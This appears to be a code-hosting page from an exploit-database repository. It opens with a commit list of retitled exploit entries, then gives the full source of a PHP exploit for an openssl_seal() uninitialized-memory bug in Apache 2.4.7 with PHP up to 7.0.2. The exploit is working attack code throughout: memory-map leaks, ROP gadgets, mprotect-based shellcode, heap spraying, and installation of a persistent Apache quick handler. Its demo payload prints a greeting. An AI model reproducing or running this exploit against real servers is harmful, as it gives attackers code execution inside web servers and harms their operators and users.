be496c36bc
3 new exploits Mandrake Linux 8.2 - /usr/mail Local Exploit /usr/mail (Mandrake Linux 8.2) - Local Exploit Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Root Exploit (3) Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3) Linux Kernel 2.2 - (TCP/IP Weakness) Exploit Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit CDRecord's ReadCD - Local Root Privileges CDRecord's ReadCD - Local Root Exploit NetBSD FTPd / tnftpd Remote Stack Overflow PoC NetBSD FTPd / Tnftpd - Remote Stack Overflow PoC Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1) Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' ring0 Root Exploit (1) Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (1) Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1) SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities SimpNews <= 2.16.2 - Multiple SQL Injection Vulnerabilities NetBSD 5.0 and below Hack GENOCIDE Environment Overflow proof of concept NetBSD 5.0 and below Hack PATH Environment Overflow proof of concept NetBSD <= 5.0 - Hack GENOCIDE Environment Overflow proof of concept NetBSD <= 5.0 - Hack PATH Environment Overflow proof of concept Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (2) Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2) Linux Kernel < 2.6.34 (Ubuntu 10.10) - CAP_SYS_ADMIN x86 Local Privilege Escalation Exploit (1) Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (1) Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2) Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (2) Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Info Leak Exploit Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) - Exploit NetBSD <= 1.4_OpenBSD <= 2.5_Solaris <= 7.0 profil(2) NetBSD <= 1.4 / OpenBSD <= 2.5 /Solaris <= 7.0 profil(2) - Exploit FreeBSD 3.4/4.0/5.0_NetBSD 1.4 Unaligned IP Option Denial of Service FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow NetBSD 1.x TalkD User Validation NetBSD 1.x TalkD - User Validation FreeBSD 4.x_NetBSD 1.4.x/1.5.x/1.6_OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition Linux Kernel 2.4 - execve() System Call Race Condition PoC Linux Kernel 2.4 - suid execve() System Call Race Condition PoC Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index PoC (1) Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1) Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2) Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Local Root Exploit (2) NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow OpenBSD 4.6 and NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3) Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3) Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption Mozilla Firefox SeaMonkey <= 3.6.10 / Thunderbird <= 3.1.4 - 'document.write' Memory Corruption Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities Linux Kernel <= 3.14.5 (RHEL/CentOS 7) - libfutex Local Root Linux Kernel <= 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow VSAT Sailor 900 - Remote Exploit Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept) Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - rootpipe Local Privilege Escalation Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation Apple OS X Entitlements Rootpipe Privilege Escalation Apple OS X Entitlements - 'Rootpipe' Privilege Escalation OS-X/x86-64 - /bin/sh Shellcode - NULL Byte Free (34 bytes) OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes) OS X Install.framework suid root Runner Binary Privilege Escalation OS X Install.framework - suid root Runner Binary Privilege Escalation Linux/MIPS Kernel 2.6.36 NetUSB - Remote Code Execution Exploit Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution Exploit Linux/x86-64 - bindshell (Pori: 5600) shellcode (81 bytes) Linux/x86-64 - bindshell (Port 5600) shellcode (81 bytes) Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Local Root Exploit Exim 4 (Debian/Ubuntu) - Spool Local Root Privilege Escalation Exim 4 (Debian / Ubuntu) - Spool Local Privilege Escalation Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032) Windows 7-10 and 2008-2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051) Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051) Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes) Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes) mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006) Apache 2.4.7 & PHP <= 7.0.2 - openssl_seal() Uninitialized Memory Code Execution
205 lines
No EOL
9.2 KiB
PHP
Executable file
205 lines
No EOL
9.2 KiB
PHP
Executable file
<?php
|
|
|
|
// Source: http://akat1.pl/?id=1
|
|
|
|
function get_maps() {
|
|
$fh = fopen("/proc/self/maps", "r");
|
|
$maps = fread($fh, 331337);
|
|
fclose($fh);
|
|
return explode("\n", $maps);
|
|
}
|
|
|
|
function find_map($sym) {
|
|
$addr = 0;
|
|
foreach(get_maps() as $record)
|
|
if (strstr($record, $sym) && strstr($record, "r-xp")) {
|
|
$addr = hexdec(explode('-', $record)[0]);
|
|
break;
|
|
}
|
|
|
|
if ($addr == 0)
|
|
die("[-] can't find $sym base, you need an information leak :[");
|
|
|
|
return $addr;
|
|
}
|
|
|
|
function fill_buffer($offset, $content) {
|
|
global $buffer;
|
|
for ($i = 0; $i < strlen($content); $i++)
|
|
$buffer[$offset + $i] = $content[$i];
|
|
return;
|
|
}
|
|
|
|
$pre = get_maps();
|
|
$buffer = str_repeat("\x00", 0xff0000);
|
|
$post = get_maps();
|
|
|
|
$tmp = array_diff($post, $pre);
|
|
|
|
if (count($tmp) != 1)
|
|
die('[-] you need an information leak :[');
|
|
|
|
$buffer_base = hexdec(explode('-',array_values($tmp)[0])[0]);
|
|
$addr = $buffer_base+0x14; /* align to string */
|
|
|
|
echo "[+] buffer string @ 0x".dechex($addr)."\n";
|
|
|
|
$align = 0xff;
|
|
$addr += $align;
|
|
|
|
echo "[+] faking EVP_PKEY @ 0x".dechex($addr)."\n";
|
|
echo "[+] faking ASN @ 0x".dechex($addr)."\n";
|
|
fill_buffer($align + 12, pack('P', $addr));
|
|
|
|
$libphp_base = find_map("libphp7");
|
|
echo "[+] libphp7 base @ 0x".dechex($libphp_base)."\n";
|
|
|
|
/* pop x ; pop rsp ; ret - stack pivot */
|
|
$rop_addr = $libphp_base + 0x00000000004a79c3;
|
|
echo "[+] faking pkey_free @ 0x".dechex($addr+0xa0-4)." = ".dechex($rop_addr)."\n";
|
|
fill_buffer($align + 0xa0 - 4, pack('P', $rop_addr));
|
|
|
|
/* pop rbp ; pop rbp ; ret - clean up the stack after pivoting */
|
|
$rop_addr = $libphp_base + 0x000000000041d583;
|
|
fill_buffer($align - 4, pack('P', $rop_addr));
|
|
|
|
$libc_base = find_map("libc-");
|
|
echo "[+] libc base @ 0x".dechex($libc_base)."\n";
|
|
|
|
$mprotect_offset = 0xf4a20;
|
|
$mprotect_addr = $libc_base + $mprotect_offset;
|
|
echo "[+] mprotect @ 0x".dechex($mprotect_addr)."\n";
|
|
|
|
$mmap_offset = 0xf49c0;
|
|
$mmap_addr = $libc_base + $mmap_offset;
|
|
echo "[+] mmap @ 0x".dechex($mmap_addr)."\n";
|
|
|
|
$apache2_base = find_map("/usr/sbin/apache2");
|
|
echo "[+] apache2 base @ 0x".dechex($apache2_base)."\n";
|
|
|
|
$ap_rprintf_offset = 0x429c0;
|
|
$ap_rprintf_addr = $apache2_base + $ap_rprintf_offset;
|
|
echo "[+] ap_rprintf @ 0x".dechex($ap_rprintf_addr)."\n";
|
|
|
|
$ap_hook_quick_handler_offset = 0x56c00;
|
|
$ap_hook_quick_handler_addr = $apache2_base + $ap_hook_quick_handler_offset;
|
|
echo "[+] ap_hook_quick_handler @ 0x".dechex($ap_hook_quick_handler_addr)."\n";
|
|
|
|
echo "[+] building ropchain\n";
|
|
$rop_chain =
|
|
pack('P', $libphp_base + 0x00000000000ea107) . // pop rdx ; ret
|
|
pack('P', 0x0000000000000007) . // rdx = 7
|
|
pack('P', $libphp_base + 0x00000000000e69bd) . // pop rsi ; ret
|
|
pack('P', 0x0000000000004000) . // rsi = 0x1000
|
|
pack('P', $libphp_base + 0x00000000000e5fd8) . // pop rdi ; ret
|
|
pack('P', $addr ^ ($addr & 0xffff)) . // rdi = page aligned addr
|
|
pack('P', $mprotect_addr) . // mprotect addr
|
|
pack('P', ($addr ^ ($addr & 0xffff)) | 0x10ff); // return to shellcode_stage1
|
|
fill_buffer($align + 0x14, $rop_chain);
|
|
|
|
$shellcode_stage1 = str_repeat("\x90", 512) .
|
|
"\x48\xb8" . pack('P', $buffer_base + 0x2018) . // movabs shellcode_stage2, %rax
|
|
"\x49\xb8" . pack('P', 0x1000) . // handler size
|
|
"\x48\xb9" . pack('P', $buffer_base + 0x3018) . // handler
|
|
"\x48\xba" . pack('P', $ap_hook_quick_handler_addr) . // movabs ap_hook_quick_handler, %rdx
|
|
"\x48\xbe" . pack('P', 0) . // UNUSED
|
|
"\x48\xbf" . pack('P', $mmap_addr) . // movabs mmap,%rdi
|
|
"\xff\xd0" . // callq %rax
|
|
"\xb8\x27\x00\x00\x00" . // mov $0x27,%eax - getpid syscall
|
|
"\x0f\x05" . // syscall
|
|
"\xbe\x1b\x00\x00\x00" . // mov $0xd,%esi - SIGPROF
|
|
"\x89\xc7" . // mov %eax,%edi - pid
|
|
"\xb8\x3e\x00\x00\x00" . // mov $0x3e,%eax - kill syscall
|
|
"\x0f\x05"; // syscall
|
|
fill_buffer(0x1000, $shellcode_stage1);
|
|
|
|
$shellcode_stage2 = str_repeat("\x90", 512) .
|
|
"\x55" . // push %rbp
|
|
"\x48\x89\xe5" . // mov %rsp,%rbp
|
|
"\x48\x83\xec\x40" . // sub $0x40,%rsp
|
|
"\x48\x89\x7d\xe8" . // mov %rdi,-0x18(%rbp)
|
|
"\x48\x89\x75\xe0" . // mov %rsi,-0x20(%rbp)
|
|
"\x48\x89\x55\xd8" . // mov %rdx,-0x28(%rbp)
|
|
"\x48\x89\x4d\xd0" . // mov %rcx,-0x30(%rbp)
|
|
"\x4c\x89\x45\xc8" . // mov %r8,-0x38(%rbp)
|
|
"\x48\x8b\x45\xe8" . // mov -0x18(%rbp),%rax
|
|
"\x41\xb9\x00\x00\x00\x00" . // mov $0x0,%r9d
|
|
"\x41\xb8\xff\xff\xff\xff" . // mov $0xffffffff,%r8d
|
|
"\xb9\x22\x00\x00\x00" . // mov $0x22,%ecx
|
|
"\xba\x07\x00\x00\x00" . // mov $0x7,%edx
|
|
"\xbe\x00\x20\x00\x00" . // mov $0x2000,%esi
|
|
"\xbf\x00\x00\x00\x00" . // mov $0x0,%edi
|
|
"\xff\xd0" . // callq *%rax
|
|
"\x48\x89\x45\xf0" . // mov %rax,-0x10(%rbp)
|
|
"\x48\x8b\x45\xf0" . // mov -0x10(%rbp),%rax
|
|
"\x48\x89\x45\xf8" . // mov %rax,-0x8(%rbp)
|
|
"\xeb\x1d" . // jmp 0x40063d <shellcode+0x6d>
|
|
"\x48\x8b\x45\xf8" . // mov -0x8(%rbp),%rax
|
|
"\x48\x8d\x50\x01" . // lea 0x1(%rax),%rdx
|
|
"\x48\x89\x55\xf8" . // mov %rdx,-0x8(%rbp)
|
|
"\x48\x8b\x55\xd0" . // mov -0x30(%rbp),%rdx
|
|
"\x48\x8d\x4a\x01" . // lea 0x1(%rdx),%rcx
|
|
"\x48\x89\x4d\xd0" . // mov %rcx,-0x30(%rbp)
|
|
"\x0f\xb6\x12" . // movzbl (%rdx),%edx
|
|
"\x88\x10" . // mov %dl,(%rax)
|
|
"\x48\x8b\x45\xc8" . // mov -0x38(%rbp),%rax
|
|
"\x48\x8d\x50\xff" . // lea -0x1(%rax),%rdx
|
|
"\x48\x89\x55\xc8" . // mov %rdx,-0x38(%rbp)
|
|
"\x48\x85\xc0" . // test %rax,%rax
|
|
"\x75\xd2" . // jne 0x400620 <shellcode+0x50>
|
|
"\x48\x8b\x7d\xf0" . // mov -0x10(%rbp),%rdi
|
|
"\x48\x8b\x45\xd8" . // mov -0x28(%rbp),%rax
|
|
"\xb9\xf6\xff\xff\xff" . // mov $0xfffffff6,%ecx
|
|
"\xba\x00\x00\x00\x00" . // mov $0x0,%edx
|
|
"\xbe\x00\x00\x00\x00" . // mov $0x0,%esi
|
|
"\xff\xd0" . // callq *%rax
|
|
"\xc9" . // leaveq
|
|
"\xc3"; // retq
|
|
fill_buffer(0x2000, $shellcode_stage2);
|
|
|
|
$handler =
|
|
"\x55" . // push %rbp
|
|
"\x48\x89\xe5" . // mov %rsp,%rbp
|
|
"\x48\x83\xec\x30" . // sub $0x30,%rsp
|
|
"\x48\x89\x7d\xd8" . // mov %rdi,-0x28(%rbp)
|
|
"\x48\xb8" . pack('P', $ap_rprintf_addr) . // movabs $0xdeadbabefeedcafe,%rax
|
|
"\x48\x89\x45\xf8" . // mov %rax,-0x8(%rbp)
|
|
"\x48\xb8" . "Hello Wo" . // movabs CONTENT,%rax
|
|
"\x48\x89\x45\xe0" . // mov %rax,-0x20(%rbp)
|
|
"\x48\xb8" . "rld!\n\x00\x00\x00" . // movabs CONTENT,%rax
|
|
"\x48\x89\x45\xe8" . // mov %rax,-0x20(%rbp)
|
|
"\x48\x8d\x4d\xe0" . // lea -0x20(%rbp),%rcx
|
|
"\x48\x8b\x55\xd8" . // mov -0x28(%rbp),%rdx
|
|
"\x48\x8b\x45\xf8" . // mov -0x8(%rbp),%rax
|
|
"\x48\x89\xce" . // mov %rcx,%rsi
|
|
"\x48\x89\xd7" . // mov %rdx,%rdi
|
|
"\xff\xd0" . // callq *%rax
|
|
"\xb8\x00\x00\x00\x00" . // mov $0x0,%eax
|
|
"\xc9" . // leaveq
|
|
"\xc3"; // retq
|
|
fill_buffer(0x3000, $handler);
|
|
|
|
$addr = pack('P', $addr);
|
|
$memory = str_repeat($addr,321);
|
|
|
|
$pem = "
|
|
-----BEGIN PUBLIC KEY-----
|
|
MCwwDQYJKoZIhvcNAQEBBQADGwAwGAIRANG2dvm8oNiH3IciNd44VZcCAwEAAQ==
|
|
-----END PUBLIC KEY-----"; /* Random RSA key */
|
|
|
|
$a = array_fill(0,321,0);
|
|
/* place valid keys at the beginning */
|
|
$k = openssl_pkey_get_public($pem);
|
|
$a[0] = $k; $a[1] = $k; $a[2] = $k;
|
|
echo "[+] spraying heap\n";
|
|
$x = array();
|
|
for ($i = 0 ; $i < 20000 ; $i++) {
|
|
$x[$i] = str_repeat($memory, 1);
|
|
}
|
|
for ($i = 0 ; $i < 20000 ; $i++) {
|
|
unset($x[$i]);
|
|
}
|
|
unset($x);
|
|
echo "[+] triggering openssl_seal()...\n";
|
|
@openssl_seal($_, $_, $_, $a);
|
|
echo "[-] failed ;[\n"; |